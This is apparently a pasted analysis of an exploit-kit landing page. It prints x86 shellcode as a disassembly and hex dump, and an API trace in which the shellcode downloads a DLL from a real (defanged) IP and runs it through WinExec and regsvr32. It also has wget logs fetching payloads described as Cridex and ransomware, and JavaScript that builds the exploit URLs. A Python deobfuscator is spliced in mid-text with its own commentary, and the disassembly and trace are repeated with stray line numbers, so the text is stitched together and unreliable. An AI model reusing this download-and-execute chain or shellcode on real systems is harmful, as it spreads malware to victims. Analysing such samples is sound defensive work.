00000110 2C0C sub al,0xc ; math
00000112 5A pop edx
00000113 5E pop esi
00000114 1A1B sbb bl,[ebx]
00000116 6C insb
00000117 EF out dx,eax
00000118 200C0508085B40 and [eax+0x405b0808],cl
0000011F 7B28 jpo 0x149
00000121 D028 shr byte [eax],1
00000123 287ED7 sub [esi-0x29],bh ; math
00000126 A3241BC079 mov [0x79c01b24],eax
0000012B E16C loope 0x199
0000012D EF out dx,eax
0000012E 2835585F5C4A sub [dword 0x4a5c5f58],dh ; math
00000134 6C insb
00000135 EF out dx,eax
00000136 2D354C0644 sub eax,0x44064c35 ; math
0000013B 44 inc esp
0000013C 6C insb
0000013D EE out dx,al
0000013E 21357128E9A2 and [dword 0xa2e92871],esi
00000144 182C6C sbb [esp+ebp*2],ch
00000147 A02C357969 mov al,[0x6979352c]
0000014C 284228 sub [edx+0x28],al ; math
0000014F 42 inc edx
00000150 7F7B jg 0x1cd
00000152 28427E sub [edx+0x7e],al ; math
00000155 D7 xlatb
00000156 AD lodsd
00000157 3C5D cmp al,0x5d
00000159 E8423E7B28 call dword 0x287b3fa0 ; call
0000015E 7ED7 jng 0x137
00000160 42 inc edx
00000161 2CAB sub al,0xab ; math
00000163 2824C3 sub [ebx+eax*8],ah ; math
00000166 D7 xlatb
00000167 7B2C jpo 0x195
00000169 7EEB jng 0x156
0000016B AB stosd
0000016C C3 ret
0000016D 24C3 and al,0xc3
0000016F 2A6F3B sub ch,[edi+0x3b] ; math
00000172 17 pop ss
00000173 A85D test al,0x5d
00000175 286FD2 sub [edi-0x2e],ch ; math
00000178 17 pop ss
00000179 A85D test al,0x5d
0000017B 2842EC sub [edx-0x14],al ; math
0000017E 42 inc edx
0000017F 28D7 sub bh,dl ; math
00000181 D6 salc
00000182 207EB4 and [esi-0x4c],bh
00000185 C0D7D6 rcl bh,0xd6
00000188 A6 cmpsb
00000189 D7 xlatb
0000018A 2666B0C4 es o16 mov al,0xc4
0000018E A2D6A12629 mov [0x2926a1d6],al
00000193 47 inc edi
00000194 1B95A2E23373 sbb edx,[ebp+0x7333e2a2]
0000019A 6E outsb
0000019B EE out dx,al
0000019C 1E push ds
0000019D 51 push ecx
0000019E 07 pop es
0000019F 324058 xor al,[eax+0x58] ; decryption
000001A2 5C pop esp
000001A3 5C pop esp
000001A4 125807 adc bl,[eax+0x7]
000001A7 07 pop es
000001A8 1E push ds
000001A9 1C19 sbb al,0x19
000001AB 06 push es
000001AC 1D1F1A061C sbb eax,0x1c061a1f
000001B1 1A1A sbb bl,[edx]
000001B3 06 push es
000001B4 1219 adc bl,[ecx]
000001B6 1810 sbb [eax],dl
000001B8 1810 sbb [eax],dl
000001BA 4E dec esi
000001BB 07 pop es
000001BC 5A pop edx
000001BD 47 inc edi
000001BE 45 inc ebp
000001BF 5D pop ebp
000001C0 44 inc esp
000001C1 07 pop es
000001C2 46 inc esi
000001C3 41 inc ecx
000001C4 5B pop ebx
000001C5 43 inc ebx
000001C6 58 pop eax
000001C7 07 pop es
000001C8 4A dec edx
000001C9 5D pop ebp
000001CA 41 inc ecx
000001CB 44 inc esp
000001CC 774B ja 0x219
000001CE 4D dec ebp
000001CF 5E pop esi
000001D0 5B pop ebx
000001D1 5A pop edx
000001D2 47 inc edi
000001D3 41 inc ecx
000001D4 06 push es
000001D5 46 inc esi
000001D6 40 inc eax
000001D7 58 pop eax
000001D8 17 pop ss
000001D9 58 pop eax
000001DA 4E dec esi
000001DB 5C pop esp
000001DC 1B1512184619 sbb edx,[dword 0x19461812]
000001E2 1912 sbb [edx],edx
000001E4 124141 adc al,[ecx+0x41]
000001E7 191B sbb [ebx],ebx
000001E9 120E adc cl,[esi]
000001EB 1B4D5F sbb ecx,[ebp+0x5f]
000001EE 1A15125E4319 sbb dl,[dword 0x19435e12]
000001F4 1912 sbb [edx],edx
000001F6 12451A adc al,[ebp+0x1a]
000001F9 1B1B sbb ebx,[ebx]
000001FB 1212 adc dl,[edx]
000001FD 1B4319 sbb eax,[ebx+0x19]
00000200 1912 sbb [edx],edx
00000202 124319 adc al,[ebx+0x19]
00000205 1B19 sbb ebx,[ecx]
00000207 1212 adc dl,[edx]
00000209 42 inc edx
0000020A 47 inc edi
0000020B 19590E sbb [ecx+0xe],ebx
0000020E 19150E434045 sbb [dword 0x4540430e],edx
00000214 58 pop eax
00000215 155E0E155E adc eax,0x5e150e5e
0000021A 285A00 sub [edx+0x0],bl ; math
0000021D 28 db 0x28

// gathered blocks of API..
blocks.. translation..
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
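The JavaScript above (split/reverse/join, then `%!` to `%u`) and the API trace that ends in `URLDownloadToFileA` can be tied together offline without running anything in a browser or sandbox. What follows is an added example, not part of the original paste and not MalwareMustDie's tooling: a Python script that replays the `var a` transform on the last fifteen tokens of the string, lays the `%uXXXX` units out little-endian (which is what the heap spray puts in memory), reads the one-byte XOR key out of the decoder stub, and then recovers the download URL from the last eight rows of the `view` hex dump. The stub is visible in the view at offset 0x13 as `80 30 28 40 e2 fa`, which is `xor byte [eax],0x28 / inc eax / loop`, so the body after the `call` is XORed with 0x28; the disassembly listing on the page was produced from the `%u` words in big-endian order (`41 41 41 41 83 66 fc e4 ...`, compare `8366FCE4` at offset 4 against `66 83 e4 fc` in the view), which is why the two read differently, and the script follows the view. The two excerpts are copied from the page; the recovered URL is the one in the payload list and in the `szURL` argument above.

```python
import re

# Last fifteen tokens of the obfuscated string `var a` from the landing page,
# copied from the page (the full string is about 2.5 KB and decodes the same way).
OBF_TAIL = ("beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%"
            "cfbe!%4ecf!%6638!%1414!%1414!%")

# Last eight rows of the page's "view" hex dump of the first shellcode (hex
# columns only, ASCII column dropped); this region holds the encoded URL.
ENCODED_TAIL_HEX = """
58 40 5c 5c 58 12 07 07 1c 1e 06 19 1f 1d 06 1a
1a 1c 06 1a 19 12 10 18 10 18 07 4e 47 5a 5d 45
07 44 41 46 43 5b 07 58 5d 4a 44 41 4b 77 5e 4d
5a 5b 41 47 46 06 58 40 58 17 5c 4e 15 1b 18 12
19 46 12 19 41 12 19 41 12 1b 1b 0e 5f 4d 15 1a
5e 12 19 43 12 19 45 12 1b 1a 12 1b 1b 12 19 43
12 19 43 12 1b 19 12 19 42 12 19 47 0e 59 15 19
43 0e 45 40 15 58 0e 5e 5e 15 5a 28 28 00
"""


def js_deobfuscate(obf):
    """Replay the page's JavaScript: reverse the string, turn '%!' into '%u',
    then emit each %uXXXX code unit little-endian, as the spray does in memory."""
    unescaped = obf[::-1].replace("%!", "%u")
    units = re.findall(r"%u([0-9a-fA-F]{4})", unescaped)
    if len(units) * 6 != len(unescaped):
        raise ValueError("unexpected characters in obfuscated string")
    out = bytearray()
    for unit in units:
        out += int(unit, 16).to_bytes(2, "little")
    return bytes(out)


# xor byte [eax], imm8 ; inc eax ; loop rel8  -> the decoder stub seen in the view
XOR_STUB = re.compile(rb"\x80\x30(.)\x40\xe2.", re.DOTALL)


def find_xor_key(shellcode):
    """Read the single-byte XOR key out of the decoder stub instead of guessing it."""
    m = XOR_STUB.search(shellcode)
    if m is None:
        raise ValueError("decoder stub not found")
    return m.group(1)[0]


def xor_decode(data, key):
    return bytes(b ^ key for b in data)


def defang(url):
    # Same convention the page uses so the recovered URL is not clickable.
    return url.replace("http", "h00p", 1)


def extract_urls(decoded):
    """URLs that appear as NUL-terminated ASCII in the decoded body, defanged."""
    found = re.findall(rb"https?://[\x21-\x7e]+", decoded)
    return [defang(u.decode("ascii")) for u in found]


def hexdump(data, width=16):
    """Same layout as the page's 'view' listing: hex columns then printable ASCII."""
    rows = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        asc = "".join(chr(b) if 0x20 <= b < 0x7f else "." for b in chunk)
        rows.append(f"{hexpart} {asc}")
    return "\n".join(rows)


def analyse_sample():
    """End-to-end run over the two excerpts: (decoded stub, xor key, urls)."""
    stub = js_deobfuscate(OBF_TAIL)
    key = find_xor_key(stub)
    body = bytes.fromhex(ENCODED_TAIL_HEX)
    urls = extract_urls(xor_decode(body, key))
    return stub, key, urls


if __name__ == "__main__":
    stub, key, urls = analyse_sample()
    print(hexdump(stub))
    print(f"xor key: 0x{key:02x}")
    for u in urls:
        print("download url:", u)
```

The first hexdump row the script prints is identical to the first row of the page's view, and the recovered URL is the second entry of the page's `//Payloads:` list. Feeding the whole `var a` or `var b` string to `js_deobfuscate` and the whole decoded body to `xor_decode` gives the complete shellcode and its URL the same way; the second shellcode differs only in the encoded query string.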


// same one.... different code.. in url parts.. two time...

// raws..

// view...
41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
e9 03 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
58 40 5c 5c 58 12 07 07 1c 1e 06 19 1f 1d 06 1a X@\\X...........
1a 1c 06 1a 19 12 10 18 10 18 07 4e 47 5a 5d 45 ...........NGZ]E
07 44 41 46 43 5b 07 58 5d 4a 44 41 4b 77 5e 4d .DAFC[.X]JDAKw^M
5a 5b 41 47 46 06 58 40 58 17 46 4e 15 19 40 12 Z[AGF.X@X.FN..@.
19 42 12 19 42 12 1b 1a 12 19 4e 0e 42 4d 15 19 .B..B.....N.BM..
42 12 1b 1b 12 1b 1a 12 19 44 12 19 4f 12 19 41 B........D..O..A
12 19 47 12 19 46 12 19 47 12 19 41 0e 5c 15 19 ..G..F..G..A.\..
43 0e 47 51 15 58 0e 42 40 15 41 28 28 00 C.GQ.X.B@.A((.

//disasm...
00000000 41 inc ecx
00000001 41 inc ecx
00000002 41 inc ecx
00000003 41 inc ecx
00000004 8366FCE4 and dword [esi-0x4],byte -0x1c
00000008 EBFC jmp short 0x6 ; loop
0000000A 58 pop eax
0000000B 10C9 adc cl,cl
0000000D 31816603E980 xor [ecx-0x7f16fc9a],eax ; decryption
00000013 FE db 0xfe
00000014 2830 sub [eax],dh ; math
00000016 E240 loop 0x58 ; loop
00000018 EBFA jmp short 0x14 ; loop
0000001A E805FFEBFF call dword 0xffebff24 ; call
0000001F FFCC dec esp
00000021 AD lodsd
00000022 1C5D sbb al,0x5d
00000024 77C1 ja 0xffffffe7
00000026 E81BA34C18 call dword 0x184ca346 ; call
0000002B 6868A3A324 push dword 0x24a3a368
00000030 3458 xor al,0x58 ; decryption
00000032 A37E205EF3 mov [0xf35e207e],eax
00000037 1BA34E14765C sbb esp,[ebx+0x5c76144e]
0000003D 2B041B sub eax,[ebx+ebx] ; math
00000040 C6 db 0xc6
00000041 A9383DD7D7 test eax,0xd7d73d38
00000046 A39018686E mov [0x6e681890],eax
0000004B EB2E jmp short 0x7b ; loop
0000004D 11D3 adc ebx,edx
0000004F 5D pop ebp
00000050 1CAF sbb al,0xaf
00000052 AD lodsd
00000053 0C5D or al,0x5d
00000055 CC int3
00000056 C17964C3 sar dword [ecx+0x64],0xc3
0000005A 7E79 jng 0xd5
0000005C 5D pop ebp
0000005D A3A3141D5C mov [0x5c1d14a3],eax
00000062 2B507E sub edx,[eax+0x7e] ; math
00000065 DD5EA3 fstp qword [esi-0x5d]
00000068 2B08 sub ecx,[eax] ; math
0000006A 1BDD sbb ebx,ebp
0000006C 61 popad
0000006D E1D4 loope 0x43
0000006F 692B851BED27 imul ebp,[ebx],dword 0x27ed1b85
00000075 F33896DA10205C rep cmp [esi+0x5c2010da],dl
0000007C E3E9 jecxz 0x67
0000007E 2B2568F2D9C3 sub esp,[dword 0xc3d9f268] ; math
00000084 37 aaa
00000085 13CE adc ecx,esi
00000087 5D pop ebp
00000088 A3760C76F5 mov [0xf5760c76],eax
0000008D 2BA34E63246E sub esp,[ebx+0x6e24634e] ; math
00000093 A5 movsd
00000094 D7 xlatb
00000095 C40C7C les ecx,[esp+edi*2]
00000098 A3242BF0A3 mov [0xa3f02b24],eax
0000009D F5 cmc
0000009E A32CED2B76 mov [0x762bed2c],eax
000000A3 83EB71 sub ebx,byte +0x71 ; math
000000A6 7BC3 jpo 0x6b
000000A8 A385084055 mov [0x55400885],eax
000000AD A81B test al,0x1b
000000AF 242B and al,0x2b
000000B1 5C pop esp
000000B2 C3 ret
000000B3 BEA3DB2040 mov esi,0x4020dba3
000000B8 DFA32D42C071 fbld tword [ebx+0x71c0422d]
000000BE D7 xlatb
000000BF B0D7 mov al,0xd7
000000C1 D7 xlatb
000000C2 D1CA ror edx,1 ; bitwise cipher
000000C4 28C0 sub al,al ; math
000000C6 2828 sub [eax],ch ; math
000000C8 7028 jo 0xf2
000000CA 42 inc edx
000000CB 7840 js 0x10d
000000CD 6828D72828 push dword 0x2828d728
000000D2 AB stosd
000000D3 7831 js 0x106
000000D5 E87D78C4A3 call dword 0xa3c47957 ; call
000000DA 76A3 jna 0x7f
000000DC AB stosd
000000DD 382DEBCBD747 cmp [dword 0x47d7cbeb],ch
000000E3 40 inc eax
000000E4 284640 sub [esi+0x40],al ; math
000000E7 285A5D sub [edx+0x5d],bl ; math
000000EA 45 inc ebp
000000EB 44 inc esp
000000EC D7 xlatb
000000ED 7CAB jl 0x9a
000000EF 3E20EC ds and ah,ch
000000F2 C0A349C0D7D7C3 shl byte [ebx-0x28283fb7],0xc3
  646. 000000F9 D7 xlatb
  647. 000000FA C3 ret
  648. 000000FB 2AA95A2CC428 sub ch,[ecx+0x28c42c5a] ; math
  649. 00000101 29A5280C74EF sub [ebp-0x108bf3d8],esp ; math
  650. 00000107 240C and al,0xc
  651. 00000109 2C4D sub al,0x4d ; math
  652. 0000010B 5A pop edx
  653. 0000010C 5B pop ebx
  654. 0000010D 4F dec edi
  655. 0000010E 6C insb
  656. 0000010F EF out dx,eax
  657. 00000110 2C0C sub al,0xc ; math
  658. 00000112 5A pop edx
  659. 00000113 5E pop esi
  660. 00000114 1A1B sbb bl,[ebx]
  661. 00000116 6C insb
  662. 00000117 EF out dx,eax
  663. 00000118 200C0508085B40 and [eax+0x405b0808],cl
  664. 0000011F 7B28 jpo 0x149
  665. 00000121 D028 shr byte [eax],1
  666. 00000123 287ED7 sub [esi-0x29],bh ; math
  667. 00000126 A3241BC079 mov [0x79c01b24],eax
  668. 0000012B E16C loope 0x199
  669. 0000012D EF out dx,eax
  670. 0000012E 2835585F5C4A sub [dword 0x4a5c5f58],dh ; math
  671. 00000134 6C insb
  672. 00000135 EF out dx,eax
  673. 00000136 2D354C0644 sub eax,0x44064c35 ; math
  674. 0000013B 44 inc esp
  675. 0000013C 6C insb
  676. 0000013D EE out dx,al
  677. 0000013E 21357128E9A2 and [dword 0xa2e92871],esi
  678. 00000144 182C6C sbb [esp+ebp*2],ch
  679. 00000147 A02C357969 mov al,[0x6979352c]
  680. 0000014C 284228 sub [edx+0x28],al ; math
  681. 0000014F 42 inc edx
  682. 00000150 7F7B jg 0x1cd
  683. 00000152 28427E sub [edx+0x7e],al ; math
  684. 00000155 D7 xlatb
  685. 00000156 AD lodsd
  686. 00000157 3C5D cmp al,0x5d
  687. 00000159 E8423E7B28 call dword 0x287b3fa0 ; call
  688. 0000015E 7ED7 jng 0x137
  689. 00000160 42 inc edx
  690. 00000161 2CAB sub al,0xab ; math
  691. 00000163 2824C3 sub [ebx+eax*8],ah ; math
  692. 00000166 D7 xlatb
  693. 00000167 7B2C jpo 0x195
  694. 00000169 7EEB jng 0x156
  695. 0000016B AB stosd
  696. 0000016C C3 ret
  697. 0000016D 24C3 and al,0xc3
  698. 0000016F 2A6F3B sub ch,[edi+0x3b] ; math
  699. 00000172 17 pop ss
  700. 00000173 A85D test al,0x5d
  701. 00000175 286FD2 sub [edi-0x2e],ch ; math
  702. 00000178 17 pop ss
  703. 00000179 A85D test al,0x5d
  704. 0000017B 2842EC sub [edx-0x14],al ; math
  705. 0000017E 42 inc edx
  706. 0000017F 28D7 sub bh,dl ; math
  707. 00000181 D6 salc
  708. 00000182 207EB4 and [esi-0x4c],bh
  709. 00000185 C0D7D6 rcl bh,0xd6
  710. 00000188 A6 cmpsb
  711. 00000189 D7 xlatb
  712. 0000018A 2666B0C4 es o16 mov al,0xc4
  713. 0000018E A2D6A12629 mov [0x2926a1d6],al
  714. 00000193 47 inc edi
  715. 00000194 1B95A2E23373 sbb edx,[ebp+0x7333e2a2]
  716. 0000019A 6E outsb
  717. 0000019B EE out dx,al
  718. 0000019C 1E push ds
  719. 0000019D 51 push ecx
  720. 0000019E 07 pop es
  721. 0000019F 324058 xor al,[eax+0x58] ; decryption
  722. 000001A2 5C pop esp
  723. 000001A3 5C pop esp
  724. 000001A4 125807 adc bl,[eax+0x7]
  725. 000001A7 07 pop es
  726. 000001A8 1E push ds
  727. 000001A9 1C19 sbb al,0x19
  728. 000001AB 06 push es
  729. 000001AC 1D1F1A061C sbb eax,0x1c061a1f
  730. 000001B1 1A1A sbb bl,[edx]
  731. 000001B3 06 push es
  732. 000001B4 1219 adc bl,[ecx]
  733. 000001B6 1810 sbb [eax],dl
  734. 000001B8 1810 sbb [eax],dl
  735. 000001BA 4E dec esi
  736. 000001BB 07 pop es
  737. 000001BC 5A pop edx
  738. 000001BD 47 inc edi
  739. 000001BE 45 inc ebp
  740. 000001BF 5D pop ebp
  741. 000001C0 44 inc esp
  742. 000001C1 07 pop es
  743. 000001C2 46 inc esi
  744. 000001C3 41 inc ecx
  745. 000001C4 5B pop ebx
  746. 000001C5 43 inc ebx
  747. 000001C6 58 pop eax
  748. 000001C7 07 pop es
  749. 000001C8 4A dec edx
  750. 000001C9 5D pop ebp
  751. 000001CA 41 inc ecx
  752. 000001CB 44 inc esp
  753. 000001CC 774B ja 0x219
  754. 000001CE 4D dec ebp
  755. 000001CF 5E pop esi
  756. 000001D0 5B pop ebx
  757. 000001D1 5A pop edx
  758. 000001D2 47 inc edi
  759. 000001D3 41 inc ecx
  760. 000001D4 06 push es
  761. 000001D5 46 inc esi
  762. 000001D6 40 inc eax
  763. 000001D7 58 pop eax
  764. 000001D8 17 pop ss
  765. 000001D9 58 pop eax
  766. 000001DA 4E dec esi
  767. 000001DB 5C pop esp
  768. 000001DC 1B1512184619 sbb edx,[dword 0x19461812]
  769. 000001E2 1912 sbb [edx],edx
  770. 000001E4 124141 adc al,[ecx+0x41]
  771. 000001E7 191B sbb [ebx],ebx
  772. 000001E9 120E adc cl,[esi]
  773. 000001EB 1B4D5F sbb ecx,[ebp+0x5f]
  774. 000001EE 1A15125E4319 sbb dl,[dword 0x19435e12]
  775. 000001F4 1912 sbb [edx],edx
  776. 000001F6 12451A adc al,[ebp+0x1a]
  777. 000001F9 1B1B sbb ebx,[ebx]
  778. 000001FB 1212 adc dl,[edx]
  779. 000001FD 1B4319 sbb eax,[ebx+0x19]
  780. 00000200 1912 sbb [edx],edx
  781. 00000202 124319 adc al,[ebx+0x19]
  782. 00000205 1B19 sbb ebx,[ecx]
  783. 00000207 1212 adc dl,[edx]
  784. 00000209 42 inc edx
  785. 0000020A 47 inc edi
  786. 0000020B 19590E sbb [ecx+0xe],ebx
  787. 0000020E 19150E434045 sbb [dword 0x4540430e],edx
  788. 00000214 58 pop eax
  789. 00000215 155E0E155E adc eax,0x5e150e5e
  790. 0000021A 285A00 sub [edx+0x0],bl ; math
  791. 0000021D 28 db 0x28
  792.  
  793. //translating API..
  794.  
  795. blocks.... translation...
  796. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  797. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  798. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  799. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  800. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  801. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  802. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  803.  
  804. //============================
  805. // PAYLOADS GOES FIRST...
  806. //============================
  807.  
  808. // fetch these sh*ts...
  809.  
  810. --2013-02-18 15:08:46-- h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r
  811. seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  812. :
  813. GET /forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r http/1.0
  814. Host: 46.175.224.21:8080
  815. http request sent, awaiting response...
  816. :
  817. http/1.1 200 OK
  818. Server: nginx/1.0.10
  819. Date: Mon, 18 Feb 2013 06:08:39 GMT
  820. Content-Type: application/x-msdownload
  821. Connection: keep-alive
  822. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  823. Pragma: public
  824. Expires: Mon, 18 Feb 2013 06:08:39 GMT
  825. Cache-Control: must-revalidate, post-check=0, pre-check=0
  826. Cache-Control: private
  827. Content-Disposition: attachment; filename="about.exe"
  828. Content-Transfer-Encoding: binary
  829. Content-Length: 94208
  830. :
  831. 200 OK
  832. Length: 94208 (92K) [application/x-msdownload]
  833. Saving to: `./about.exe'
  834. 2013-02-18 15:08:48 (59.5 KB/s) - `./about.exe' saved [94208/94208]
  835.  
  836.  
  837. --2013-02-18 15:07:55-- h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
  838. seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  839. :
  840. GET /forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i http/1.0
  841. Host: 46.175.224.21:8080
  842. http request sent, awaiting response...
  843. :
  844. h00p/1.1 200 OK
  845. Server: nginx/1.0.10
  846. Date: Mon, 18 Feb 2013 06:07:48 GMT
  847. Content-Type: application/x-msdownload
  848. Connection: keep-alive
  849. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  850. Pragma: public
  851. Expires: Mon, 18 Feb 2013 06:07:48 GMT
  852. Cache-Control: must-revalidate, post-check=0, pre-check=0
  853. Cache-Control: private
  854. Content-Disposition: attachment; filename="readme.exe"
  855. Content-Transfer-Encoding: binary
  856. Content-Length: 279040
  857. :
  858. 200 OK
  859. Length: 279040 (273K) [application/x-msdownload]
  860. Saving to: `./readme.exe'
  861. 2013-02-18 15:08:00 (70.7 KB/s) - `./readme.exe' saved [279040/279040]
  862.  
  863.  
  864. //Payloads checks...Cridex & ransomware....
  865.  
  866. https://www.virustotal.com/ja/file/bea956049c02eefa07495dda55a1624ba3fe4020ed268094f7b63ec53439d48d/analysis/1361171081/
  867. https://www.virustotal.com/ja/file/5050a5bdf164767ba6a8432a273942983737b3553c2f0d8fdbab42bbdaab3f6e/analysis/1361171101/
  868.  
  869.  
  870.  
  871. =============CRACK LOGIC FOR PDF URL==================
  872.  
  873. function x(s){                  // BHEK URL param encoder: each char of s -> charCode in base 33, ":"-joined
  874. var d = [];
  875. for (var i = 0; i < s.length; i ++ ){
  876. var k = (s.charCodeAt(i)).toString(33);
  877. d.push(k);
  878. }
  879. return d.join(":");
  880. }
  881.  
  882.  
  883. var domain="h00p://46.175.224.21:8080";
  884. var pdf ="1k:1d:1f:1d:1g:1d:1f";
  885.  
  886. var string1 ="/forum/links/public_version.php?tzpiqxci=" + x("244e0") + "&rqoddrzb=" + x("bpc") + "&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=";
  887. var string2 ="/forum/links/public_version.php?iitxovwc=" + x("244e0") + "&hic=" + x("c") + "&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=" ;
  888. var string3 ="/forum/links/public_version.php?hysb=" + x("c833f") + "&togkor=" + x("oyt") + "&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=";
  889. var string4 ="/forum/links/public_version.php?myedivup=" + x("c833f") + "&gtaaynbu=" + x("h") + "&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=";
  890.  
  891. var url1 = domain + string1 + pdf;
  892. var url2 = domain + string2 + pdf;
  893. var url3 = domain + string3 + pdf;
  894. var url4 = domain + string4 + pdf;
  895.  
  896. document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
  897.  
  898.  
  899. // output:
  900.  
  901. h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
  902. h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
  903. h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
  904. h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33&gtaaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
  905.  
  906.  
  907. //=============CRACK LOGIC FOR SWF URL==================
  908.  
  909. function x(s){                  // same encoder as in the PDF section: charCode in base 33, ":"-joined
  910. var d = [];
  911. for (var i = 0; i < s.length; i ++ ){
  912. var k = (s.charCodeAt(i)).toString(33);
  913. d.push(k);
  914. }
  915. return d.join(":");
  916. }
  917.  
  918.  
